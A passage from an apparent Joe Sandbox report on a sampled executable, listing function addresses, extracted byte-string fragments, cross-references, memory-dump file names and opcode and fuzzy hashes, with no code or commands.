x"a, xrefs: 00007FF6415F84A5

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
API String ID: 0-3286678768
Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction ID: 7a2599e6b594e5cb5a449de16c29663419a109f25d40864ca3e267fcc9829fa9
Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction Fuzzy Hash: C3330AB5A0C78585EF7D7614A0942FE6392EB99394F50013ADABED3BF8DE2CD4448B01

Function 00007FF641631510 Relevance: 25.2, Strings: 19, Instructions: 1480COMMON

Download Yara Rule

Strings

(M, xrefs: 00007FF641631B26
\7Zs, xrefs: 00007FF6416315F1
dn, xrefs: 00007FF641632BD9
q}', xrefs: 00007FF6416318CF
J]M+, xrefs: 00007FF641632C82
q}', xrefs: 00007FF641631CD6
q}', xrefs: 00007FF641631CEB
zN7w, xrefs: 00007FF64163259D
zN7w, xrefs: 00007FF641632F76
dn, xrefs: 00007FF64163284D
]7Zs, xrefs: 00007FF641631987
q}', xrefs: 00007FF64163213E
yN7w, xrefs: 00007FF64163244B
]7Zs, xrefs: 00007FF641631862
);.0N^s, xrefs: 00007FF641631536
(M, xrefs: 00007FF64163209C
q}', xrefs: 00007FF641631EF9
zN7w, xrefs: 00007FF6416326B1
J]M+, xrefs: 00007FF6416323A2

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: (M$(M$);.0N^s$J]M+$J]M+$\7Zs$]7Zs$]7Zs$dn$dn$yN7w$zN7w$zN7w$zN7w$q}'$q}'$q}'$q}'$q}'
API String ID: 0-43781059
Opcode ID: d2bc5af13dff40c9f61f9086366e939f88c01156ca9a17152a2cb77dbb1f1692
Instruction ID: 89dc65e55c8f806b763c33115b0d25eb612c1371818103381ad72826396792ce
Opcode Fuzzy Hash: d2bc5af13dff40c9f61f9086366e939f88c01156ca9a17152a2cb77dbb1f1692
Instruction Fuzzy Hash: 1CD23072A0C68A86EB36B719A49027E7391EF54350F14413EE64EC7FD8DF2CE941AB41

Function 00007FF64164CC40 Relevance: 23.6, Strings: 18, Instructions: 1145COMMON

Download Yara Rule

Strings

UQm*, xrefs: 00007FF64164D217
TQm*, xrefs: 00007FF64164D20C
~ec, xrefs: 00007FF64164E0EF
unordered_map/set too long, xrefs: 00007FF64164E3E3
~ec, xrefs: 00007FF64164CF66
Rs<i, xrefs: 00007FF64164E0D0
UQm*, xrefs: 00007FF64164DD82
hF{h, xrefs: 00007FF64164CF93
~ec, xrefs: 00007FF64164E3CC
~ec, xrefs: 00007FF64164D6C2
.!)5, xrefs: 00007FF64164CF08
iF{h, xrefs: 00007FF64164DC0B
iF{h, xrefs: 00007FF64164CF9E
~ec, xrefs: 00007FF64164D303
iF{h, xrefs: 00007FF64164E0EA
UQm*, xrefs: 00007FF64164D541
.!)5, xrefs: 00007FF64164E30D
Rs<i, xrefs: 00007FF64164CFA9

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: .!)5$.!)5$Rs<i$Rs<i$TQm*$UQm*$UQm*$UQm*$hF{h$iF{h$iF{h$iF{h$unordered_map/set too long$~ec$~ec$~ec$~ec$~ec
API String ID: 0-1542828796
Opcode ID: 677a04d54593f28023c93bcf9b6fa69eef5f8503c591345dc315b4b68ef5763c
Instruction ID: 9de4b978e91b72d4506ee8ac580f08288e47f812db4c7e7ef6f6702361fc3b3f
Opcode Fuzzy Hash: 677a04d54593f28023c93bcf9b6fa69eef5f8503c591345dc315b4b68ef5763c
Instruction Fuzzy Hash: BBC28436A0DBC981DB75AB19E4A43AEB7A0E789780F104536DACDC7B64DF2CD480DB05

Function 00007FF641655B80 Relevance: 20.9, Strings: 15, Instructions: 2162COMMON

Download Yara Rule

Strings

>(q, xrefs: 00007FF641655E6A
|bC, xrefs: 00007FF6416565DC
|bC, xrefs: 00007FF641656406
h,], xrefs: 00007FF64165772E
/, xrefs: 00007FF641655E76
>(q, xrefs: 00007FF641656873
>(q, xrefs: 00007FF64165686E
/, xrefs: 00007FF64165612F
9sJZ, xrefs: 00007FF641656F11
Ap1, xrefs: 00007FF641655DD0
>(q, xrefs: 00007FF641656D4D
9sJZ, xrefs: 00007FF641657723
h,], xrefs: 00007FF641657BCD
Ap1, xrefs: 00007FF641656C42
{bC, xrefs: 00007FF641655DA0

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
API String ID: 0-1954784225
Opcode ID: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction ID: 4fb0ba243614e1549420d65a87b80661f85722ed3c87e3e2569fcff25703aa71
Opcode Fuzzy Hash: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction Fuzzy Hash: 0823D536A0D78686EB76B614F4A437E7391EB84390F644136D68DC7BA6CF2CE440EB41

Function 00007FF641645860 Relevance: 19.8, Strings: 15, Instructions: 1053COMMON

Download Yara Rule

Strings

j.um, xrefs: 00007FF641645B42
.g-, xrefs: 00007FF641645C2F
-g-, xrefs: 00007FF6416458F7
NJ", xrefs: 00007FF641645A8C
-DR, xrefs: 00007FF641645C78
;'J, xrefs: 00007FF6416459E6
k.um, xrefs: 00007FF64164630B
-DR, xrefs: 00007FF6416463D3
.g-, xrefs: 00007FF641646644
OJ", xrefs: 00007FF6416459BD
;'J, xrefs: 00007FF6416462DC
OJ", xrefs: 00007FF641645AA2
;'J, xrefs: 00007FF641645F67
;'J, xrefs: 00007FF641645F5D
k.um, xrefs: 00007FF641646061

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: -DR$-DR$-g-$.g-$.g-$NJ"$OJ"$OJ"$j.um$k.um$k.um$;'J$;'J$;'J$;'J
API String ID: 0-3506230456
Opcode ID: bc74c7d2337a77b87f9c4cc6c756059029d88aff56a9a384d9a8e3852fcf087e
Instruction ID: dfae8d7c4753de3b4211971f7c03aa5eb67415f88fd09405fec307cbb904f604
Opcode Fuzzy Hash: bc74c7d2337a77b87f9c4cc6c756059029d88aff56a9a384d9a8e3852fcf087e
Instruction Fuzzy Hash: 2AA2DC36F0C782CAFB75B718A4A027E6392EB59350F114536EB5EC7795CE2CE480AB05

Function 00007FF641613AD0 Relevance: 18.5, Strings: 14, Instructions: 993COMMON

Download Yara Rule

Strings

]_v, xrefs: 00007FF6416141BD
0s, xrefs: 00007FF641613D5F
\f', xrefs: 00007FF641613C40
t?^, xrefs: 00007FF6416144F0
0s, xrefs: 00007FF6416140D5
t?^, xrefs: 00007FF641614BCE
1Uj, xrefs: 00007FF641613FEA
0s, xrefs: 00007FF641613D6B
\f', xrefs: 00007FF64161460F
1Uj, xrefs: 00007FF641614D95
]_v, xrefs: 00007FF641614A32
]_v, xrefs: 00007FF6416141D2
[f', xrefs: 00007FF641613C28
]_v, xrefs: 00007FF641613CBE

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ]_v$]_v$]_v$]_v$[f'$\f'$\f'$t?^$t?^$0s$0s$0s$1Uj$1Uj
API String ID: 0-4198073719
Opcode ID: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction ID: ce71d245379650cdb6fb3fdaa5288b61f27111b374dac170891f233c7a8f4d9f
Opcode Fuzzy Hash: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction Fuzzy Hash: CE92EC35B0D28286E779BA1C95A067D6A90AF55760F10013EEA9FC7FD4DF2CE840BB41

Function 00007FF64161B6A0 Relevance: 17.5, Strings: 13, Instructions: 1290COMMON

Download Yara Rule

Strings

PF&+, xrefs: 00007FF64161C12B
*q, xrefs: 00007FF64161BF6E
XKn', xrefs: 00007FF64161C681
?c, xrefs: 00007FF64161BF84
a<i, xrefs: 00007FF64161B911
XKn', xrefs: 00007FF64161C115
PF&+, xrefs: 00007FF64161CF5F
?c, xrefs: 00007FF64161BF39
WKn', xrefs: 00007FF64161BA24
*q, xrefs: 00007FF64161BF06
b<i, xrefs: 00007FF64161C9C9
)q, xrefs: 00007FF64161B980
b<i, xrefs: 00007FF64161C2CA

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
API String ID: 0-253853581
Opcode ID: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction ID: b91daaba714dd08f8818f809bf9d4498ed9c360e369ea2f1834f7afc632b269e
Opcode Fuzzy Hash: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction Fuzzy Hash: 28C2D832F0D6C58EEB76BE2998803FD2AB5EB08754F244936DA1DCB794CE28D541A305

Function 00007FF6416304D0 Relevance: 17.1, Strings: 13, Instructions: 835COMMON

Download Yara Rule

Strings

kxgK, xrefs: 00007FF641630E0A
0we, xrefs: 00007FF641630582
QMea, xrefs: 00007FF641630D87
4u`m, xrefs: 00007FF64163095A
QMea, xrefs: 00007FF641631495
4u`m, xrefs: 00007FF641631209
4u`m, xrefs: 00007FF641630DF5
4u`m, xrefs: 00007FF641631204
1we, xrefs: 00007FF6416306E7
kxgK, xrefs: 00007FF64163117C
1we, xrefs: 00007FF64163130E
3u`m, xrefs: 00007FF64163069B
1we, xrefs: 00007FF641631313

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 0we$1we$1we$1we$3u`m$4u`m$4u`m$4u`m$4u`m$QMea$QMea$kxgK$kxgK
API String ID: 0-554904181
Opcode ID: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction ID: d5db881db1924fcbdf337bcb6fa565bb914707bb70f8f092c2550e3c48a2f07e
Opcode Fuzzy Hash: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction Fuzzy Hash: 7B721B23E1D68AC5EB76B718A58027E63D0EB447A0F205536E94DC7FE4DE2CE845BB01

Function 00007FF64160BAB0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON

Download Yara Rule

Strings

Z]N, xrefs: 00007FF64160CC3D
C\!N, xrefs: 00007FF64160C22D
yXF, xrefs: 00007FF64160BBEB
Tm]., xrefs: 00007FF64160CADD
Z]N, xrefs: 00007FF64160C12F
zXF, xrefs: 00007FF64160CF0E
Tm]., xrefs: 00007FF64160C343
vector too long, xrefs: 00007FF64160BAB4
C\!N, xrefs: 00007FF64160CE8A
Z, xrefs: 00007FF64160C889
zXF, xrefs: 00007FF64160BC17
Z, xrefs: 00007FF64160C506

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: C\!N$C\!N$Tm].$Tm].$Z]N$Z]N$Z$Z$vector too long$yXF$zXF$zXF
API String ID: 0-2263072351
Opcode ID: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction ID: 78815e578468e08045cc42537b715ad1139a83530259bf8c1f16a06b1c170f72
Opcode Fuzzy Hash: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction Fuzzy Hash: C6A2403AA0D68587DB75F718A49137E7B90EB86340F608176E55DC7BE8DF2CE840AB01

Function 00007FF6416343B0 Relevance: 16.0, Strings: 12, Instructions: 1036COMMON

Download Yara Rule

Strings

t", xrefs: 00007FF641634DDB
p2, xrefs: 00007FF6416354FA
s", xrefs: 00007FF6416344C0
r2'a, xrefs: 00007FF641634593
t", xrefs: 00007FF641634B7A
)m, xrefs: 00007FF6416344DD
)m, xrefs: 00007FF641634C69
)m, xrefs: 00007FF641634D4D
r2'a, xrefs: 00007FF641635774
ISB, xrefs: 00007FF641634D38
p2, xrefs: 00007FF6416347E3
ISB, xrefs: 00007FF64163546C

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: r2'a$r2'a$s"$t"$t"$ISB$ISB$p2$p2$)m$)m$)m
API String ID: 0-611830788
Opcode ID: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
Instruction ID: 5925a4269a02860ce348a68d4c67d1bfde7e6236afb97a9d7e68e87db8b1c02f
Opcode Fuzzy Hash: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
Instruction Fuzzy Hash: 1CA2F932A0D78586EB75AB54F48027EA391FB84744F244636ED8DC7F99CE3CD845AB01

Function 00007FF64160D7A0 Relevance: 13.0, Strings: 10, Instructions: 480COMMON

Download Yara Rule

Strings

`4H, xrefs: 00007FF64160E01B
wsG5, xrefs: 00007FF64160D870
<OJ/, xrefs: 00007FF64160D9C9
xsG5, xrefs: 00007FF64160DA8C
xsG5, xrefs: 00007FF64160D956
C:\Users\user\AppData\Local\Temp\8EC7.exe, xrefs: 00007FF64160D7A8
=OJ/, xrefs: 00007FF64160DB46
`4H, xrefs: 00007FF64160DB66
=OJ/, xrefs: 00007FF64160D84A
=OJ/, xrefs: 00007FF64160DBC6

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: <OJ/$=OJ/$=OJ/$=OJ/$C:\Users\user\AppData\Local\Temp\8EC7.exe$wsG5$xsG5$xsG5$`4H$`4H
API String ID: 0-2158703796
Opcode ID: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction ID: fc036ce9871e64f26dfe6b69e0fbb4938394f1adacdbf4f0d50ba4f6d6b17bd5
Opcode Fuzzy Hash: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction Fuzzy Hash: 5B12DD26A0C2C28BE776F628548037E6B91DB97354F244736EA5DC77D6CE3CE940AB01

Function 00007FF64164F370 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON

Download Yara Rule

Strings

,)W, xrefs: 00007FF64164F8E1
iq*, xrefs: 00007FF64164F833
-)W, xrefs: 00007FF64165022E
Miz , xrefs: 00007FF641650F82
iq*, xrefs: 00007FF64164FD16
-)W, xrefs: 00007FF641650254
Liz , xrefs: 00007FF64164FB3E
iq*, xrefs: 00007FF641650723
Miz , xrefs: 00007FF641650374

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
API String ID: 0-548768203
Opcode ID: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction ID: 6cf5cc545c6ffce5680a2f08a7c4d48f366d8f31a09a0eecf954ce03e7caa411
Opcode Fuzzy Hash: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction Fuzzy Hash: 9EE20A36A0DBC182EB75AB1CA09437E6390EB84754F21153BDA8DC7B99CF3CE444AB05

Function 00007FF64164B020 Relevance: 12.6, Strings: 9, Instructions: 1361COMMON

Download Yara Rule

Strings

!cH, xrefs: 00007FF64164C547
!cH, xrefs: 00007FF64164BA50
n.P', xrefs: 00007FF64164C0A5
tcD, xrefs: 00007FF64164B505
invalid hash bucket count, xrefs: 00007FF64164CC14
~hP, xrefs: 00007FF64164BDA3
tcD, xrefs: 00007FF64164BECC
~hP, xrefs: 00007FF64164B799
n.P', xrefs: 00007FF64164B33D

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: !cH$!cH$invalid hash bucket count$n.P'$n.P'$tcD$tcD$~hP$~hP
API String ID: 0-2997982297
Opcode ID: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
Instruction ID: c22596f892f849fb109ebd94947f9789f7a38fe2b9ea49e9746d2a287bd5dccc
Opcode Fuzzy Hash: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
Instruction Fuzzy Hash: 8ED2F63660C68586DB7DEA64E8B037E7355EBC4740F20413ADA9F83B98DE2DD440DB4A

Function 00007FF641643E80 Relevance: 12.6, Strings: 9, Instructions: 1321COMMON

Download Yara Rule

Strings

,VT, xrefs: 00007FF641644775
h1, xrefs: 00007FF641644D12
,VT, xrefs: 00007FF64164488B
bGI, xrefs: 00007FF641644AF1
)qk, xrefs: 00007FF641644258
h1, xrefs: 00007FF6416447ED
)qk, xrefs: 00007FF6416445D4
bGI, xrefs: 00007FF6416447E3
(qk, xrefs: 00007FF6416440AB

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: h1$h1$(qk$)qk$)qk$,VT$,VT$bGI$bGI
API String ID: 0-3994866152
Opcode ID: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
Instruction ID: 1415384a2d5e9903381498818b0aa5d7675afc36dd62cdc6028271f9060bc6e9
Opcode Fuzzy Hash: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
Instruction Fuzzy Hash: 0ED20922A0C7C186EB75AB18E06137E6790FB94758F104636EE8DC7BA4DF2DE490E705

Function 00007FF641665D40 Relevance: 11.9, Strings: 9, Instructions: 654COMMON

Download Yara Rule

Strings

*TZ%, xrefs: 00007FF64166609D
_^|, xrefs: 00007FF641665FE1
_^|, xrefs: 00007FF6416661A5
*TZ%, xrefs: 00007FF641665E73
) )~, xrefs: 00007FF6416663DA
7ZX, xrefs: 00007FF641666358
_^|, xrefs: 00007FF6416663CC
) )~, xrefs: 00007FF6416667A5
7ZX, xrefs: 00007FF64166612D

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
API String ID: 0-1291360158
Opcode ID: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction ID: 100eb64832943412b36556c8001a9417acd87bd74f01625043ed34810b0f9187
Opcode Fuzzy Hash: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction Fuzzy Hash: 8B423232B0C28687EB79BA1CA45523E63D19FA43D0F50513AE95FC7BD4CE2CE8416B45

Function 00007FF641603E30 Relevance: 11.9, Strings: 9, Instructions: 605COMMON

Download Yara Rule

Strings

@N[, xrefs: 00007FF641604084
"(, xrefs: 00007FF6416041EE
DEj', xrefs: 00007FF64160411E
CEj', xrefs: 00007FF641603E97
"(, xrefs: 00007FF64160442C
@N[, xrefs: 00007FF64160467C
@N[, xrefs: 00007FF64160408E
@N[, xrefs: 00007FF641604359
DEj', xrefs: 00007FF641604257

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: "($"($@N[$@N[$@N[$@N[$CEj'$DEj'$DEj'
API String ID: 0-2996620231
Opcode ID: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
Instruction ID: 4eda1db694fdecc3a91578867035f8667062d71f0a0bfc541e96ac539c859fa7
Opcode Fuzzy Hash: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
Instruction Fuzzy Hash: 72320C32A0C6428AEB75FA1CE54473E6B91EB46751F600637E99DC7BD5CE2CEC40AB01

Function 00007FF6416716C0 Relevance: 10.6, Strings: 8, Instructions: 580COMMON

Download Yara Rule

Strings

2s, xrefs: 00007FF64167173F
`.K*, xrefs: 00007FF641671A10
2s, xrefs: 00007FF641672168
2s, xrefs: 00007FF641671807
2s, xrefs: 00007FF64167215D
_.K*, xrefs: 00007FF6416719E4
`.K*, xrefs: 00007FF641671BCC
bS, xrefs: 00007FF641671867

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: bS$2s$2s$2s$2s$_.K*$`.K*$`.K*
API String ID: 0-1048334069
Opcode ID: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
Instruction ID: 8b8fc21f4ed2cf8bd85d02242140707fdb6ec26a0cb0838b73eb8475ebbb010a
Opcode Fuzzy Hash: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
Instruction Fuzzy Hash: BF322E26A0C68186EF767719A08027EA791EB45791F200537EABDC7BD4DF3CE584AF01

Function 00007FF641673F20 Relevance: 10.5, Strings: 8, Instructions: 480COMMON

Download Yara Rule

Strings

S; 9, xrefs: 00007FF6416746BA
S; 9, xrefs: 00007FF64167428B
|O, xrefs: 00007FF6416744DF
Qz%a, xrefs: 00007FF641674692
Qz%a, xrefs: 00007FF641674304
-wJ[, xrefs: 00007FF641674269
